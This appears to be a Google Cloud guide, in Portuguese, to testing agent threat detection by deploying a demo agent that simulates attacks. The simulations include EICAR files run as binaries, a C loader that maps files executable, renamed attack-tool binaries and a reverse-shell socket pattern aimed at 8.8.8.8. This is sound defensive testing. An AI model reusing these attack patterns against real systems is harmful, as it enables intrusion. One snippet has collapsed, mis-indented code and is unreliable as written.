Testar a detecção de ameaças da plataforma do agente

Nesta página, explicamos como verificar se a detecção de ameaças da plataforma do agente está funcionando por meio do acionamento intencional de detectores e da verificação de descobertas. A detecção de ameaças da plataforma do agente é um serviço integrado do Security Command Center.

Antes de começar

Para detectar possíveis ameaças aos agentes do Agent Runtime, verifique se o serviço Detecção de ameaças da plataforma do agente está ativado no Security Command Center.

Configurar o ambiente

Para testar a detecção de ameaças da plataforma do agente, configure um agente de demonstração que simule atividades maliciosas.

Criar um projeto e ativar o shell

Selecione ou crie um projeto do Google Cloud para usar nos testes.

Para testar os detectores, use o Google Cloud console e o Cloud Shell.

  1. Acesse o console doGoogle Cloud .

    Acesse o console do Google Cloud .

  2. Selecione o projeto que você vai usar para testar.

  3. Clique em Ativar o Cloud Shell.

Também é possível executar as instruções de teste em um shell local.

Configurar o Agent Runtime

Se você nunca usou o Agent Runtime neste projeto, configure o ambiente do Agent Runtime antes de começar. Registre o nome do bucket temporário do Cloud Storage que você criou. Também recomendamos que você siga o início rápido do tempo de execução do agente para aprender a desenvolver e implantar um agente com o SDK da Vertex AI.

Criar script de teste

Você vai criar vários arquivos que serão usados para implantar um novo agente para testes. Use um editor de texto para isso, como o nano.

  1. Crie um novo arquivo chamado requirements.txt com o seguinte conteúdo.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. Crie um novo arquivo vazio chamado installation_scripts/install.sh. Alguns testes exigem a adição de conteúdo a esse arquivo.

  3. Crie um novo arquivo chamado main.py com o seguinte conteúdo. Substitua as variáveis PROJECT_ID, LOCATION e STAGING_BUCKET. O nome do bucket de staging precisa incluir o prefixo gs://.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

Configurar o ambiente virtual

  1. Crie e ative um ambiente virtual Python.

      python3 -m venv env
      source env/bin/activate
    
  2. Instale as dependências necessárias no ambiente virtual.

    pip install -r requirements.txt
    

Testar o script:

Execute o script de dentro do ambiente virtual com python3 main.py. Esse comando leva alguns minutos para criar, implantar e executar o agente de teste.

O script gera o nome do recurso do agente implantado e alguns objetos JSON, incluindo uma resposta do LLM e outros metadados. Se você encontrar erros de permissão ou de implantação nesta etapa, consulte a solução de problemas para as próximas etapas.

Detectores de teste

Para testar os detectores da Detecção de ameaças da plataforma de agentes, substitua o código na função threat_detection_test por um código que simule um ataque. O script pode levar muito tempo para ser implantado e consultar o agente. Para acelerar os testes, combine o conteúdo de várias dessas funções.

Execução: binário malicioso adicionado executado

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

Execução: biblioteca maliciosa adicionada carregada

Substitua a função threat_detection_test no script de teste e execute-o. Você pode receber um erro do SDK da Vertex AI sobre a análise da resposta, mas a descoberta ainda será gerada.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

Execução: escape de contêiner

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

Execução: execução de ferramenta de ataque do Kubernetes

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

Execução: execução da ferramenta de reconhecimento local

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

Execução: binário malicioso modificado executado

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Execução: biblioteca maliciosa modificada carregada

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

URL malicioso observado

Atualize o arquivo installation_scripts/install.sh com o seguinte conteúdo.

#!/bin/bash
apt-get install -y curl --no-install-recommends

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Shell reverso

Substitua a função threat_detection_test no script de teste e execute-o.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

A seguir